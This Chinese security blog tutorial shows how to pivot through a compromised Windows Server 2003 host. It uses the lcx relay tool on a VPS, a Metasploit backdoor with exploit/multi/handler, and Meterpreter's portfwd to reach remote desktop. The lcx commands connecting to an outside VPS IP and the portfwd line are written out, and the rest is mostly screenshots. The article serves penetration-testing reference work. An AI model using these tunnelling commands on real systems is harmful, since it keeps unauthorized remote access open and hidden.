本文《使用 Msf 和 lcx 进行 Port Tunnel》由armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。
使用 Msf 和 lcx 进行 Port Tunnel
![图片[1]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel1.png)
连接示意图
VPS 服务器上用 lcx 工具进行端口监听
lcx -listen 5353 3535
![图片[2]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel2.png)
Attack Target (Windows Server 2003) 服务器上运行 Msf后门并用 lcx 工具进行端口转发
Windows Server 2003 网络配置
![图片[3]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel3.png)
![图片[4]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel4.png)
运行 Msf 后门程序
![图片[5]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel5.png)
运行 lcx 工具链接 VPS 服务器进行本地端口转发
lcx -slave 172.87.24.247 5353 127.0.0.1 9009
![图片[6]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel6.png)
![图片[7]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel7.png)
(VPS 上可看到来自 Attack Target 的网络连接)
BackBox 上启动 msfconsole 进行后门链接
![图片[8]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel8.png)
启动 msfconsole 加载 exploit/multi/handler
![图片[9]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel10.png)
![图片[10]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel9.png)
Msf 终端下执行 run 命令启动链接
![图片[11]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel11.png)
Meterpreter 内网端口转发
Portfwd命令简单端口转发(本地 3389 远程桌面转发)
![图片[12]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel13.png)
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.
-L 选项指定本地监听的主机(即 Backbox 主机,可简单指定为:0.0.0.0)
-l 选项指定本地监听的端口(即 Backbox 主机监听的端口,可简单指定为:3389)
-p 选项指定远程主机要转发的端口(例如 Attack Target(Windows Server 2003)上的 3389 端口)
-r 选项制定远程主机网络地址(例如 Attack Target(Windows Server 2003) 的 127.0.0.1)
![图片[13]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel12.png)
转发远程主机 3389 进行远程桌面链接
Portfwd add -L 0.0.0.0 -l 3389 -r 127.0.0.1 -p 3389
![图片[14]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel14.png)
连接 Backbox 主机的 3389 端口
![图片[15]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel15.png)
![图片[16]-使用 Msf 和 lcx 进行 Port Tunnel-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2017/02/Tunnel16.png)
行文至末,属于比较详细的图文记录档案,可作为参考备用,欢迎不断查阅。
本文《使用 Msf 和 lcx 进行 Port Tunnel》由armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。
本文作者:armyzer0
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/55314.html
暂无评论内容